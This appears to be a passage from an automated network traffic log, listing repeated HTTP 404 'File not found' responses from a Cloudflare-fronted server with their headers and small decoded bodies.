                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:13 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vLfAG7fmX6CyxJzEk0O%2FBmg16SmrBE5YBS%2BRqup8BBlwc6IKUiq47jBhstgYikzkzMesviFQn6p1zW4GFv1I33WYuGftqKKV0g1GwmVoOI9dfpmoaBmAp7BfaYYlwjL6gInDoblSgql%2F6c1Q%2FtwThQC5OxPEAg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec088686f5c38-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:15 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vIoJjlpOUB4ch8A9vB%2FKQqgVGqG%2FBMM%2BfQzehosuEFSNQFo0gE9WIhQc2ZWAsVfi803z79IZC7COD7vw7q3ZvK9f7Lpn0xBwaC95bSAWCuYNsNId8NhJwwCkVxQHYxnxd4FRF8MJkTCEfItWcIZzhdJYp6PXZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec091ad1b4aaa-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:16 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B6WLQ0YL6zFlWhHgnt6U6cMjNqhg5htzjtx%2FJ7jjaqAcyvmGs5vvqQFzydOJ0caWu3xNVdyUaeMy0GV8mS37gvIqcjdOZZ0esg5rlfOM%2FG%2FhL%2Bsg9F9ZhQbRtpEBXBQq5liRP8vYQAFgvHT%2FvZ5gZZtn75E7xw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec09b293e5be5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:18 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NEEHx%2BkmIT9asVndpNXR1AoGjnCHChsMAYShF5yGwYqEj%2FgJsdB0Mx0KbcltXiFP56kkMvROqu%2FHNChiSzQKeS2N34dJxa42lt0RG86mw%2F6702IFnVtlIfN7UOJyiytUwY3ivfQHS555wFEzMe%2FIT1fowiWd1w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0a39b634e8b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:20 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4smlu4lSWaMUj8PWc%2BGpmke%2BENRvCwicQAhGufEzY4Xwa7kc3y6YhyyyYu%2BwPR0zEsPEe1hN0%2BiA2kWHr%2FJE%2BXajyLuEfTCC38E6%2FySGXkOUU0sGE9B9d2NunzFnN9Jpxmznzq%2BWLqFLCc88Y6o8kCh%2BJdWbng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0b28e524e5c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:21 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rzu%2FohVuhjczWDe7tSOrF0uRiMZdPJrfjpN1hISShviTn6CxquhhvYU2ZYQ2Afh3g6P1FuSAKzKR6pmpqQCL727H0cqqtCgKFYjeXiZlAHmuAv%2B5N6h1XDjgPB5X%2FZuAlzCAkAnMt54YuBWaZYpOMDRgoMijug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0bb69254339-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:23 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PIDL4Ex4yVSKIruz6ska5ciNfQXYfiK08MG3n%2Fl5sBh3uTbHelpQ%2BjFtXJazHaCXD%2FcS9T%2FNICexg23jtCzdGJnXlzeuuDLWonv2ZPeq4lMjDt5h2txZPLlLYA9u9inYXLCUr1h1CBSjz2d%2B08xCKW78cQE3ng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0c56e57d6d1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:27 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ltrm6sBYZ30PkF8Z7VQJ7TUsrGZvzAnFrCkFXlgpwUKIwSLl0AKErABPq3oLlrSThb2YL8K3CEZTNit0GLpNLsiF78D%2Bo%2FeB6vJTTi3fwh0lA8bdxzosx88%2BepGYJVN9NOxQjuwGMKesX%2FSg1REiYGp8lFNnQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0debb1b68f7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:29 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tR8YTHsFUlHBp8jLYHNxWg6PfHZ0Q9qY6Z3f00iw%2FRPkfDCJWPs2NCsHs%2BJRNc7qtmk0cQf9cr5pQNsUFXF%2BJcUJy6DqBggagu08v%2BAxRuxiMb5hoOAO2BqKdlUHQOZJ0B4Pm%2FOMKal28DTap0fJzQTMHSpwyg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0ec5bd44401-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:31 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L2EsWzEZJKWTDEn93sKWFLzev8Sl0yir0x01b%2BkSL3ujzOb1%2BV3ppWcxuzQdjug6QJKPfPBqA70PVP6l0gcrvl1Nke8DdVo%2BNZdDAhag%2BRgxa5KekRs3f6n4KUeQs4FC1ErSaLb8kvrBEaD%2FKEum9jCbi9W6LA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec0f9584568fe-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:33 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wa5i4pYc47XTZTSRKuePuJGDKfzroVXSpP4vHBUDcpsntok8NHAncV7jpTLBPs6CkrH8kUIW9ytBz2JwxWNyMqJw1jmWzD%2Fy1Bnna2df9JCgcS%2Fw7JdgzCjsdEOd%2BbuV0ccxxBXnyytwG6K3l%2FcIIvtKwmy4fQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1015b90702b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:35 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=68hgMnUBuHCsDUjLDFpqWCCQ2g0nALTKRqB%2BkiRtXAxjxPALNlT80KDT0GEMZAtpHUyMeDuNH4MC3L2MUas1uw3Tkjx5nm6dtpUi4kAfnIyf5i1cJw47x%2BYEBToHMbM6J5K1gQPhnXfkSWBbeb76%2Bs%2F4PqZQXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec10f6862646d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:37 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YUMi%2BKCQiebAYfk%2BBHidFFMjdX1L%2B1Iti6n0n9f53wMYFdVumBnToBBg78Fzogxr7V3VykOGcApOxm9l1ZNdwS3q1NBnlV56c4eet1gWdXUfPWzTFfWnX4HH4BnbmoIGtizbJCTdvwv6CXf3B0vdLyoWMpNG7g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec11a19e04a7f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:38 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R6o5MMg7SbvUqktXOhLjA1Fnbswl29jahtPLPtZB%2F4x11eIb1xozO%2BsAnzF9weZv0qW6u4hDKdl%2FulXZxPK440HB6R9%2BHt10S57wJou4G%2B1ynyQn8M318af4%2FOta46SlgLFPdMQ9Fk1N%2Bbz9IjlO9LnEHUhfxw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1216ed06927-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:39 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hGTok4Pwn41ZRv1MumUHtTCRvKskuQeV7Tzz2LKP7TXQ%2BjHQX%2Bdc7hCUk0B93YW6i4W3l25Za7zFA9%2BUgikpTke7QSUXWzExiifQ89U8wsISzKRfHFHuLqm%2BOsRCRCWUlSjMQHz33ABcV%2F%2BHbvOmCP2te4WgCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1291bfb6943-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:40 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1W6FUoErQkVxlBPw7%2BXATW83hqhBSlVS6%2FhzlhKejgcPspDjQWYsm3X5UX3pJCE9Ts7B%2BzefPUHY%2BB%2BB8iI5yQqS8bnXyeWA6pA0FPv3X6QGWOzitWjJfeequ1dvbp%2FoQG57ZdzOBYGjNXOLdmI%2FpOQ67mjazg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1317c562c32-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:41 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GO6eCdCM4%2F6hA7dtd%2FoaiUrVjzpTaEYd0xVhp5YRWC%2BcFYd%2B827KZzyPcBHQZIMwEPE1lsx4Y%2FXrxohcjCmA2j%2FkkXNqUbdwkLVmbF7cdjV7n1NxRpQeMBRyy%2FLA0LTuL7Nvjpyb%2Buz9nG1ScVdle1E27JKKHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec138b9821456-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:43 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CxsCHuzow%2F33c%2FCkji95GCcFRRddEjpXSTQlsgwfn1tNfjUG93xxIl1QFhyVjuOCfzG3xO4Dx0oqdciEFdAMIjFtDzSwsy%2BZAnBFJ%2BUIcvKJcPAL57TCTabS1rK7mISZlPofKYNa1NQhc21szCDAJAXGAw7LbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec14189124e0d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:44 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MFrv0XyktSeHA%2B%2FfE1zcEPcFFNmyDk1d8pBeW%2BPZ0DJJyDKM24IqF9Ua%2FLPJGa2QUt1%2F9p1PJhMy%2FqaXGD1%2FbCm79J0uGI0QAXTq9IQa9oVo94V3focmH3c91ymeJg1qFR1TPjejGWcfhJ7eFrLUoAL7XbrPtQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec148ba214e14-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:45 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RW1TGqFwuxrswdzsjqOAixFxJjq9GdKUdYo7aOj19dNBG4Lyyy7SsCmQykgjcONrTmazNouCKp2Z9hD9oj9zcv4osPlARNNPDj7pHenc2sXbowSWmyPcUlYaDlCHIFiv0mk3hl9DBkS9teWGWpN7dgSnssg4aw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1510989d70d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:47 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tSBa4s2D4P4jpBx6UmblYjjTd9CZpovgF%2BPWqgNr38olq5O0aV%2BRwk6guUtz2KJcSkWnxUnrdqNk5vMbb8hVzaTtDOCB%2BcJpa1cxebjsNw2fxMN7oJxmUx78qf%2BG%2FL3VMFTIyyLXSMoDYeD9fnUR9J7qMZA67A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1584bd8d729-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:48 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9ZdGBK3Ox1p3BP97R4wYPo9%2BZ%2BK%2BUNVgFS7K2qZhwn3i65B5C5A3pC3HLkVBNXtwYCFsRF61IdHwby7cVDx52m03DlTnECOLo8Lmli9FT05kblnLTrBBndQTbweHp3wkkwehoYbNghK3zTDnn9Dwh%2FhMcQro9g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec15f58a805f1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:49 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VWWcbe3rqobGQ9zLXDZxDyBG75FOgSItYobuAtwDJpuAbL30zBatxbptze92UIC6gFoHQbenK4p440cH1CZduHVw9uJaoknjqoprxaW930U5gFR4LDNYtmvuhdpe4PmdBZYp9RJ3m58CjMFtKREDlk3%2FI4VSUQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1674b4c2c3e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:51 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BsMAOCkH1sJ0oabis0Q4paNtyJNrES9QQwxvqkXvAl%2FY7%2BLQH8xSnKIcHV%2BPPogWaqk3yG%2FJ6vxc%2FEk34SqAVeWUDw7vDSJQdrJh0Hz27m7Tiv3u6y6ahjT5NNVAW4JRx6Ib5AME7x%2F0Mc2jzF8N3OMd71mu%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1774cc64e3d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:55 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LZ79cKido18sGHwuiNL%2F6O3gjFK34JZEyXZk1N8Qfy7pzHQIXqqquQIRfLJylWp%2Blb0ebXTVq%2F1bHmKtkJSRQAwrjU9cWyaKEY%2BfKI4BTUk6fnLRAUL796Gtr9VyUOxCK%2BmAyJmCSy2lit2HcTF7NC6%2BtJ15NA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1900cfd68ef-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:57 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MLALdhBf343n2G8LZLoDwb6Mh5vWVGbC472SfDfdBH%2B1zblvJJUUdQJELnMb%2Bod0RSTtp3nexN46I4MemNvht6DC79ZyaLJ9Tj8z0PlQvLxyWkeCuuJUc6JQy22HYxAbvcclmEPUk4DRcOjj7k3c%2FCX8oeDUlg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1971aee4dbe-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:58 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pVTqfGYZG6lbiEUhHSdVmZCauemUr0Y%2BDwMOl8jQ0ldqgtA9xITilJs5vYZLZNEyT9OJN5kbjp%2BHOE4k2qqoAIe1jVhjQmKAUvsYFRYqMSmsNtQoFZ6LNXkpPSpmxGfDzqZFj4XqecgblbCCY5cS5zLZfkAuhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec19dfc3bdfcb-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:59 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gkjqA8qOHfmIDF%2B8y6qiYNfi%2BvKCn%2B9wfdd4HCP%2BYK0cnk28ajujXQRfcV4yPhPUB7cMD%2BZEx7KfsoCvsEDx9F1mGzxm8QL25QRC9D1NyirQW8VbFsNKnqSicUuJ0ck1LD6iO4oBLd%2BuJGOeJcZ4Ij1Vwl5I4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1a53d361f21-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
